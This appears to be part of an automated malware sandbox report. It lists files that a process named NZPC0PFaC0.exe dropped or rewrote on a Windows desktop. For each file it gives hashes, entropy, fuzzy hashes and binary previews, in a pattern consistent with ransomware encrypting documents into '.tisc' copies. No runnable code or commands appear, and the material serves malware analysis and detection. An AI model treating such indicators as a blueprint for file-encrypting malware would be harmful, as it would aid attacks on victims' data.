                                                                                    MD5:2A55BCB2C39CF5D3D0971795E2F63209
                                                                                    SHA1:BA44704ED2C9FCE67144625D56CCCE05BBB6B13E
                                                                                    SHA-256:89472EF975C0DC4367ED98C69AB708CA9A74A9850A459FF13DAE3236657AC5F6
                                                                                    SHA-512:AE727E449318370BF80AA2E4C45C3CC7CF4D62ED29F6CA48F8E8D262C343A831D0B77A960C55933B74568AD10312AEFBD7FEB0C0FDBCFB4FFE8A1AE4E98D1B03
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 3i#Y-......*...m.S. .w...011y....U...J.....A...C...I.K....&.:...UM.]j....r{.ER/.1.....V.+... ..P....b........G..+RV.Or.6...U%v..t.2r.<N..w...Q....1jD.S....~2....5......(.rI...n.O...g&..QA,[.T...._O..C.N..}{..:..@:l ....z.,$....-.(.R..N....R.:...0....r./t"o.q+n..[.i.'..^.a...s..j......N6.# o...P..)...NG... .............{...'.*^.5.`Ii@.;.B..z.<.Yu...{.....6...35k...PX....~.N...}.X..5..:l...z.#...g^_iw.eU...'..\B+..F.n...{..l...E....n....o......I....e&....]}..D.D....-$j...5..Y.(;C.....*,..N.&.|.I.........n.i.N >.D...w.. !.HQ.....&.=q.P.&...C...@..d.s..m...G......,..Af.{.C......Z....;vk.+.U.43.0u....n.T`B....RR..z=....:...J.|.V/ ......4v.{.j.*..xb..O./8.m.....c.m.......k..]H...&.O..K~...j`..i%f./."...T.....U..)..t..Q0....~).9...`K.te...n....c?.....(.i.0f...:.~..G2.G.f...\-X........Pj..|.m....j..C)1..r...WC..h&l.......)..U.u....M.'...m......2...f..}..P..".3.E..."j...A..q.m..@z...D....#.Q.bD%Q....?..H......F.Tz.K..h0`C.i.w......E*.s.....).
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.813632561226543
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:UmDr7EPCq3XEvDzMc6URAo/ohabSDRXRFozA+/LDeAmrsugbD:UWPezXEvMUB/4VRXR2PjSAhrD
                                                                                    MD5:6941EF31600255BCCFCB6B690931945A
                                                                                    SHA1:7E5D85D720041714C6C26E5D64B305E5FAC11E5B
                                                                                    SHA-256:2C23F869DCE7E364A02257F38561867AFA710503BF03B4113F9AAAE07852EA2B
                                                                                    SHA-512:99FD05A83423AA264E0B99C80A4DBC9A15921C5EC55E1CC17D41721FDC77BC46C5E5B24BF4F2B243D49C7F54D315EAD506D16A33998D6596405265D266C4D008
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .......>..-....z.e>.ox..y-..G...!.EE....U.i]Fi...%.d6qo.l....J.v.k.K...tJ...o5.?.?&.6..u...#.]Y=.J....:b..k.... .g..$..G...5.o..]mz.2m.38q.$...T8.K.kK...O.,..<....Y......Y|L...6t.-.......x.......;3C ...y...^c...@......X.z=......5.H.....:}s7...U.T.hU-.....D....k.k....#....Uh!...%Bq......'-....G..?`.:.u.VJw.... _.K......T.hD..+n.:..7........U;..J...h...6..,..L/.l..Uka6q.u.'.......?~..g...m.x...?...L..{...y}..Dq.....{`.+.t.N.._aE"...Y$8.>V...A...l.R..qf^..c..#Mp.....g..%.|...Ew.?M5..tX4K...K."......V./....v...wu....iIN..PT.U.-+.............Q....K....jmU.B&.....W[.(..s.0......`O.\...G..`.F1....s....O...,.....@..:...5.<.....e.@...c.....~3...JI9.*D7..Lu..L....}.T......+.....;...8..r&K..2._..R.1P... .8L.......W'S.d!....+,K........u...L...B%./A.R.zr.%2.`.....+.cc.+./..]..e`X.pv.5D...;hU...b...HK..#..6!.Mz.....<..d......~.w==7*..k....`}.fsl=........b...h2......E...p..4..e\c7...m....7..+/.1"*]%....]..s.....DgD.w]z'H.....140.[..y#T..2..`..
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.813632561226543
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:UmDr7EPCq3XEvDzMc6URAo/ohabSDRXRFozA+/LDeAmrsugbD:UWPezXEvMUB/4VRXR2PjSAhrD
                                                                                    MD5:6941EF31600255BCCFCB6B690931945A
                                                                                    SHA1:7E5D85D720041714C6C26E5D64B305E5FAC11E5B
                                                                                    SHA-256:2C23F869DCE7E364A02257F38561867AFA710503BF03B4113F9AAAE07852EA2B
                                                                                    SHA-512:99FD05A83423AA264E0B99C80A4DBC9A15921C5EC55E1CC17D41721FDC77BC46C5E5B24BF4F2B243D49C7F54D315EAD506D16A33998D6596405265D266C4D008
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .......>..-....z.e>.ox..y-..G...!.EE....U.i]Fi...%.d6qo.l....J.v.k.K...tJ...o5.?.?&.6..u...#.]Y=.J....:b..k.... .g..$..G...5.o..]mz.2m.38q.$...T8.K.kK...O.,..<....Y......Y|L...6t.-.......x.......;3C ...y...^c...@......X.z=......5.H.....:}s7...U.T.hU-.....D....k.k....#....Uh!...%Bq......'-....G..?`.:.u.VJw.... _.K......T.hD..+n.:..7........U;..J...h...6..,..L/.l..Uka6q.u.'.......?~..g...m.x...?...L..{...y}..Dq.....{`.+.t.N.._aE"...Y$8.>V...A...l.R..qf^..c..#Mp.....g..%.|...Ew.?M5..tX4K...K."......V./....v...wu....iIN..PT.U.-+.............Q....K....jmU.B&.....W[.(..s.0......`O.\...G..`.F1....s....O...,.....@..:...5.<.....e.@...c.....~3...JI9.*D7..Lu..L....}.T......+.....;...8..r&K..2._..R.1P... .8L.......W'S.d!....+,K........u...L...B%./A.R.zr.%2.`.....+.cc.+./..]..e`X.pv.5D...;hU...b...HK..#..6!.Mz.....<..d......~.w==7*..k....`}.fsl=........b...h2......E...p..4..e\c7...m....7..+/.1"*]%....]..s.....DgD.w]z'H.....140.[..y#T..2..`..
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.836573060407606
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:tlvdW1iUOmfVLvGJXUhv3vNJm28efysl7GFxkntmlgdna2+eyX37WVkXOg9lgbD:tldUFfRcS3FJLOeSgtmG+rXrnO1D
                                                                                    MD5:90ACDEA410C8A6D1A889E133F2EB4109
                                                                                    SHA1:EAC7B5114E562ABBBE789A0284D0455E5C4A53C2
                                                                                    SHA-256:21471DD23FAC23BE862444EC1AE57B00FBAF4AEFC6224794A97B0B1098C67E1B
                                                                                    SHA-512:EC987AC3F9E277A5620CBC3D71FF759E2C33070DE7D70294C25B4549BF42B9D9C06EA1F9888763BBE77C0B0D995F91FA99B21C0981CAACA60832D10B4EE3B896
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.836573060407606
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:tlvdW1iUOmfVLvGJXUhv3vNJm28efysl7GFxkntmlgdna2+eyX37WVkXOg9lgbD:tldUFfRcS3FJLOeSgtmG+rXrnO1D
                                                                                    MD5:90ACDEA410C8A6D1A889E133F2EB4109
                                                                                    SHA1:EAC7B5114E562ABBBE789A0284D0455E5C4A53C2
                                                                                    SHA-256:21471DD23FAC23BE862444EC1AE57B00FBAF4AEFC6224794A97B0B1098C67E1B
                                                                                    SHA-512:EC987AC3F9E277A5620CBC3D71FF759E2C33070DE7D70294C25B4549BF42B9D9C06EA1F9888763BBE77C0B0D995F91FA99B21C0981CAACA60832D10B4EE3B896
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.845287471051355
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:tgWzfDIAp/yc5+oW6tv2Z3Qe8ld8pLNtMXJoiq6fXTuSpetw3DxvRKgbD:2Wz3Ry+xtv2q0pNyXBjuUetw33D
                                                                                    MD5:0362DA9723A04F96A570196BE15DBC8D
                                                                                    SHA1:AB9B87E021FC2AB8BD55AC5AACCAE8409FDED3E4
                                                                                    SHA-256:BAA2FD404B30AFA4454B9AC4B104DD243BFD40A179F12CBBCB8044B7E65C30BB
                                                                                    SHA-512:101F13731003C4B1E9F67FAC59E4014B7C1926EC66B2100C4BCA9E9A4AA4D1BBB717AD707BD3A33AC76FBAB831CC3840237C725C33D8888F3632116DC1A5B481
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.845287471051355
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:tgWzfDIAp/yc5+oW6tv2Z3Qe8ld8pLNtMXJoiq6fXTuSpetw3DxvRKgbD:2Wz3Ry+xtv2q0pNyXBjuUetw33D
                                                                                    MD5:0362DA9723A04F96A570196BE15DBC8D
                                                                                    SHA1:AB9B87E021FC2AB8BD55AC5AACCAE8409FDED3E4
                                                                                    SHA-256:BAA2FD404B30AFA4454B9AC4B104DD243BFD40A179F12CBBCB8044B7E65C30BB
                                                                                    SHA-512:101F13731003C4B1E9F67FAC59E4014B7C1926EC66B2100C4BCA9E9A4AA4D1BBB717AD707BD3A33AC76FBAB831CC3840237C725C33D8888F3632116DC1A5B481
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\BNAGMGSPLO.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843009665327425
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:cMz/OUpS5b+1p9wv/0ApDo+UIRFXMtF802e8r6+b5fBdaJhX3J9//YI/KgU23KgX:9/OTJlvsApDJRFXMgH5BdaJhX33wI/Kq
                                                                                    MD5:E70389DF5131426CF0B0A8DF9161A453
                                                                                    SHA1:34CF06A8011C70805E37C97B8477DC20B4743EFB
                                                                                    SHA-256:71ECDC9198D3A1C322C61E6FA4D1D33DB0104B403216DE2991D878D9DFFC09CB
                                                                                    SHA-512:8FC27451A576AA3E39F1833F6E34E70355B08866AB1911A71973246A4DEA565E4F6A5E7D32A56BB2992D58D680AEBF0A3917018EC6F364253021DF4325C1CDFB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\BNAGMGSPLO.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843009665327425
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:cMz/OUpS5b+1p9wv/0ApDo+UIRFXMtF802e8r6+b5fBdaJhX3J9//YI/KgU23KgX:9/OTJlvsApDJRFXMgH5BdaJhX33wI/Kq
                                                                                    MD5:E70389DF5131426CF0B0A8DF9161A453
                                                                                    SHA1:34CF06A8011C70805E37C97B8477DC20B4743EFB
                                                                                    SHA-256:71ECDC9198D3A1C322C61E6FA4D1D33DB0104B403216DE2991D878D9DFFC09CB
                                                                                    SHA-512:8FC27451A576AA3E39F1833F6E34E70355B08866AB1911A71973246A4DEA565E4F6A5E7D32A56BB2992D58D680AEBF0A3917018EC6F364253021DF4325C1CDFB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\PIVFAGEAAV.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.861535146687928
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:MBkaW+ScWOjhtpYSo9qT5fB/9xaC8/PjIs3bQtmqBSvzQhhagbD:QzW+wwhXYSmqT3aCccsLQwqovUhxD
                                                                                    MD5:3DE1F98F3A577BB8D320DBBACFBB4915
                                                                                    SHA1:3606EB3E48E54E68CB2FD046F9CF110389E5CA29
                                                                                    SHA-256:83448352160ACF5358F8FE0FA773B7A79CC8A89C6F8FDF679EBC425B72FCAB8E
                                                                                    SHA-512:7180766AC2687937C78AFEA8A89746715BA6398C57F77C17BDA1ED6A80C5431592B6412A19D66D562F1886208EEC3BF8265D509473A5EE31324C3842D51C8B7B
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\PIVFAGEAAV.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.861535146687928
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:MBkaW+ScWOjhtpYSo9qT5fB/9xaC8/PjIs3bQtmqBSvzQhhagbD:QzW+wwhXYSmqT3aCccsLQwqovUhxD
                                                                                    MD5:3DE1F98F3A577BB8D320DBBACFBB4915
                                                                                    SHA1:3606EB3E48E54E68CB2FD046F9CF110389E5CA29
                                                                                    SHA-256:83448352160ACF5358F8FE0FA773B7A79CC8A89C6F8FDF679EBC425B72FCAB8E
                                                                                    SHA-512:7180766AC2687937C78AFEA8A89746715BA6398C57F77C17BDA1ED6A80C5431592B6412A19D66D562F1886208EEC3BF8265D509473A5EE31324C3842D51C8B7B
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\PWCCAWLGRE.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.870708000949349
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:EpxmHaX6syxo9R/jmMzbf0h0PlXTcqwIzJasEoubfvq4fe6vG9tTebhMCC1P89+p:EDkaIo9hj31lXQqwiJUoyW6+AMCClk+p
                                                                                    MD5:61E200E080D1E1E9DBF7FD1CB5213E38
                                                                                    SHA1:EEC85EA5C229E29AB3FA9692DF6698CF876F334A
                                                                                    SHA-256:0EA214225274B8AD26B755DF9C35127EFBD631F4CC357D8432B9A8CF98914474
                                                                                    SHA-512:F4A03B71CCBDF4E4B3D3361B3EC6353B88CF63DB2913887B74F4AF66FEB4F3512FE18FBC1D02D71CCCE3E84E3E6A22BBE75DE015C379D5F878DAB1D8FA560CE7
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\PWCCAWLGRE.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.870708000949349
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:EpxmHaX6syxo9R/jmMzbf0h0PlXTcqwIzJasEoubfvq4fe6vG9tTebhMCC1P89+p:EDkaIo9hj31lXQqwiJUoyW6+AMCClk+p
                                                                                    MD5:61E200E080D1E1E9DBF7FD1CB5213E38
                                                                                    SHA1:EEC85EA5C229E29AB3FA9692DF6698CF876F334A
                                                                                    SHA-256:0EA214225274B8AD26B755DF9C35127EFBD631F4CC357D8432B9A8CF98914474
                                                                                    SHA-512:F4A03B71CCBDF4E4B3D3361B3EC6353B88CF63DB2913887B74F4AF66FEB4F3512FE18FBC1D02D71CCCE3E84E3E6A22BBE75DE015C379D5F878DAB1D8FA560CE7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\QCFWYSKMHA.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.855603537246963
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HYDVabV4JxVtn9k2X/vAgRQxBTo8FMwjHEdlc0hf1cb69jGv1UFOvRdFut2gbD:44bVKVR9DXgnxBTo8Oqilc0hdh9CSFOG
                                                                                    MD5:1FA3EEEB9F2F7333E6BD9455704A98D1
                                                                                    SHA1:C107AD4C02F3674EA176BDE8DCA75BD8DDAA1931
                                                                                    SHA-256:5A8124527F1C93820A72B3666C2418867D78456D3776B890B6E50F016A5FB3EF
                                                                                    SHA-512:BACEE8B76BD080B45A06331944240589234F37A8FEE2D445512F42A8BD192368777D0CF50BFA9B3F908BB08D0CA1C2082EE24E4BF79B68A97953B5B809E44551
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\QCFWYSKMHA.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.855603537246963
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HYDVabV4JxVtn9k2X/vAgRQxBTo8FMwjHEdlc0hf1cb69jGv1UFOvRdFut2gbD:44bVKVR9DXgnxBTo8Oqilc0hdh9CSFOG
                                                                                    MD5:1FA3EEEB9F2F7333E6BD9455704A98D1
                                                                                    SHA1:C107AD4C02F3674EA176BDE8DCA75BD8DDAA1931
                                                                                    SHA-256:5A8124527F1C93820A72B3666C2418867D78456D3776B890B6E50F016A5FB3EF
                                                                                    SHA-512:BACEE8B76BD080B45A06331944240589234F37A8FEE2D445512F42A8BD192368777D0CF50BFA9B3F908BB08D0CA1C2082EE24E4BF79B68A97953B5B809E44551
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 6..ZC.. .v....+:......m......"n.0..fV......B...R..`.r......}^q.U.'[.u...a..#e..r.>...d...j.a@.........K<....{... ZF....u5\iH......m)....Q...mf..0.n....?Y..K'.UH..!.CU.&..T..9[c.$..z..H.......7..r..Ny........3...x.i.8h..h_....x.W......$X..mD.H.jrl....&Y.0.5.w[...o.E..f.c.Y.../.Rj....6..S.rj..(...4.8&.E.}d....J.*.2..VO......4kb|3.=7.LQr|%......a.../...g([.......eC......w....p`.o.gC..%....;....X.\3..H..n.g.pt.L.O4..?"..[.K .x.,B|....t<..C..!..F.2..._w....R.m..j.$.F.._.4....h>%.!..$f.8cYL......0........n.2p\.n.B.....f.l.O.Z+.[.X...^.J..8.....g../....l..d...{.h...0".87b.v.!....k.G.....e\..#R.I..Xf_./..x....{..z..AR..V.....c..q6..h...h...Z}..l....w..... ...&...~......?.#..&.k>.a`.S)\5..s..D..]W..SS.8>.0.........+h....-..v/...bt.M.x.......Q..K...X.L/...=.ETR.:N.E.?..tP'.....W..T\B....Z.......kj'..vF...3t)Q..W..<..+e....N..K."k9b`....._-.[?..O..f.Uv.....g.%..T7...X.......E.+...[=7..[.......a..3.k.k;W(.....Oc8x G.....3',.Z*..>...S.7...K..
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.844310667032083
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:nQ71FykNJP50Gp7wjLRTsXIF1F7XkhfzoUp+XhoEgTnJaze87GxmC8wTX13e3gbD:nG0kPh0GRwQIF1lX4pzEglV8yxmRw7gi
                                                                                    MD5:5C4C7EA1ECBA8CA68EEF26BF522797D9
                                                                                    SHA1:1571652C64FC40C2D6E0B5745663BFDB4BA34AAC
                                                                                    SHA-256:7BF3EF6A1A6558C38B0D94EF6CA09522F39D1279E2F65AA4078CBC28D140A977
                                                                                    SHA-512:6E9E0ACD8935CAA301EB6B76B41B0035CCD3F41F6BE920031C8BEDA8391052683BDEB3C0AC42D680E8CC933DB99C772DDE482368EDEC66031CE20891CE29FA60
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview: ..D.......<:.......o).).< ..A..N.^E.#.X.....ta....-|.{&Q[..]s.8.]......d...B;[G_.-....e..2...[_6...@....7[.5...J.4..V.....X... .fA.l ....f...'S.mO:..b.).zjV]4H.$w.......E.$..c.|.(=.*;.....,.7......._..{&. ..f9.t.veS.......%._.o.? ?.m....'a+..%q.;'.9.9...z.E.2/........V(...c'..|@...*.j....../..........q...z6j...(g.............2...i}a..$....>..}L7.7.a....#..;t.d6B.=.9..k.Z..|...*....L.P^.~bx....-I.;p...(.a....3 O.s..r.........XT.;...<'bm...2....3..eH..gERD...p..W.q...aTf...aNg+..../.........k...!..\..~C.klf.@\..).....\l....J.....x.'.D....g.~...S#.u.k.m2}8H...8hWQ............E......N.`..y...%.g....W...8..)uQ......auI.H.u;h...Gn;....s.d/..I..[x..2.......I...-.:X....Q.....*...9.t.CO....I.........a..05.4.W3D..q..h...c.=..^....=...=.D7+..:.n.....x.x~...L.q.]..V/3...UR)...dv..b.Q.>.Q..o..#...%.)...."GO..E~`..f....!LkY.@/....Q.p.&0.J...Y..s.c..9P...}..~^.........N[..Q>.a.....F.......r.....?..CE..`{R..9.@.HY..........0...........]...e
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.844310667032083
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:nQ71FykNJP50Gp7wjLRTsXIF1F7XkhfzoUp+XhoEgTnJaze87GxmC8wTX13e3gbD:nG0kPh0GRwQIF1lX4pzEglV8yxmRw7gi
                                                                                    MD5:5C4C7EA1ECBA8CA68EEF26BF522797D9
                                                                                    SHA1:1571652C64FC40C2D6E0B5745663BFDB4BA34AAC
                                                                                    SHA-256:7BF3EF6A1A6558C38B0D94EF6CA09522F39D1279E2F65AA4078CBC28D140A977
                                                                                    SHA-512:6E9E0ACD8935CAA301EB6B76B41B0035CCD3F41F6BE920031C8BEDA8391052683BDEB3C0AC42D680E8CC933DB99C772DDE482368EDEC66031CE20891CE29FA60
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..D.......<:.......o).).< ..A..N.^E.#.X.....ta....-|.{&Q[..]s.8.]......d...B;[G_.-....e..2...[_6...@....7[.5...J.4..V.....X... .fA.l ....f...'S.mO:..b.).zjV]4H.$w.......E.$..c.|.(=.*;.....,.7......._..{&. ..f9.t.veS.......%._.o.? ?.m....'a+..%q.;'.9.9...z.E.2/........V(...c'..|@...*.j....../..........q...z6j...(g.............2...i}a..$....>..}L7.7.a....#..;t.d6B.=.9..k.Z..|...*....L.P^.~bx....-I.;p...(.a....3 O.s..r.........XT.;...<'bm...2....3..eH..gERD...p..W.q...aTf...aNg+..../.........k...!..\..~C.klf.@\..).....\l....J.....x.'.D....g.~...S#.u.k.m2}8H...8hWQ............E......N.`..y...%.g....W...8..)uQ......auI.H.u;h...Gn;....s.d/..I..[x..2.......I...-.:X....Q.....*...9.t.CO....I.........a..05.4.W3D..q..h...c.=..^....=...=.D7+..:.n.....x.x~...L.q.]..V/3...UR)...dv..b.Q.>.Q..o..#...%.)...."GO..E~`..f....!LkY.@/....Q.p.&0.J...Y..s.c..9P...}..~^.........N[..Q>.a.....F.......r.....?..CE..`{R..9.@.HY..........0...........]...e
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.838174766100615
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:AHnNunt3t6mMMNCV3M+g925TYcW3YezjIWwK2XN9HkpocHw/+qoIFTRgbD:YQcMNCV3I902o+jD/2/HzHmyFUD
                                                                                    MD5:EB3200010AFEDC51CC5D3721B613B616
                                                                                    SHA1:635CCC4ADC72EE214E0C30C917409728884C780E
                                                                                    SHA-256:5AAB21AA004E4D1A0061F20AF4A002AB15F46B0C998EFDA51C8843847F9E2320
                                                                                    SHA-512:EB5CB673D7F6BBB0822C129BD9A22B524A2C54D5B1F9A9966B4D4D81644140C4441B93EA9894734B568B68ADFA2E9705AE9B86CB3C3E7AC815A601280F1AEFF7
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview: ;..0.;.'E..2.ki#...`..Al.2..x.Z.......2w..1..uYD....4e..F.#l..:...{L.k....2.x.....%L.5...T...@C.......B..Z)x...q..#..O....;dot...../.w..I./Ul.PM.H#..H..A.N......./.....nI.9.f....q~.tbH.......7.7.I..9|...M.*<;...E,,9...f;=.+.y..I.h....v.{...i.~>..?.X.D..)...J.9.OB;R..(.........nH%J/..*.J..V..Q.6i.Tw..q..3..-T.....x.............r....V.._.v.z.nJ...+B~G..Im.'._K...t.e.k.d}-w$.(......B.....?..EIv...-..W{..}......$J.^q[.......$G^.$.....&.G....J..Lp....0....iA'C...5&.L.'..a..Wb.!.9....L.7".B...._S..I ...TJlx..:u..6..%.6..w...#.s.H4]...<....5z...b....[....zQ.[._..!Y....Z.:z.J..p...%.<]......b:.i.]BL...S.8yn..-...n.E.q...1...`..6.....=....B>..s.R.s.1...F.wr..V.......c.N4<...ElK".4W..N:n..,...<wY.....83.....a{.3c9v..+..O1.t.7]@.1R...z.5..Mtr7t9...*....am.F......e?p...6i...X.k..C:)....S&_ud...`m..RU.s..z..[@.K...X.;Q..0G4.O. ..5.o..b.,.)ndh..#..[..a..j5n[..a..z.......^.3tN!......o...[~JUX...8xD .....s^g1....<l...;Qu..VP.k.nC...G..N....D.......'.iNZk.R0
                                                                                    C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.838174766100615
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:AHnNunt3t6mMMNCV3M+g925TYcW3YezjIWwK2XN9HkpocHw/+qoIFTRgbD:YQcMNCV3I902o+jD/2/HzHmyFUD
                                                                                    MD5:EB3200010AFEDC51CC5D3721B613B616
                                                                                    SHA1:635CCC4ADC72EE214E0C30C917409728884C780E
                                                                                    SHA-256:5AAB21AA004E4D1A0061F20AF4A002AB15F46B0C998EFDA51C8843847F9E2320
                                                                                    SHA-512:EB5CB673D7F6BBB0822C129BD9A22B524A2C54D5B1F9A9966B4D4D81644140C4441B93EA9894734B568B68ADFA2E9705AE9B86CB3C3E7AC815A601280F1AEFF7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
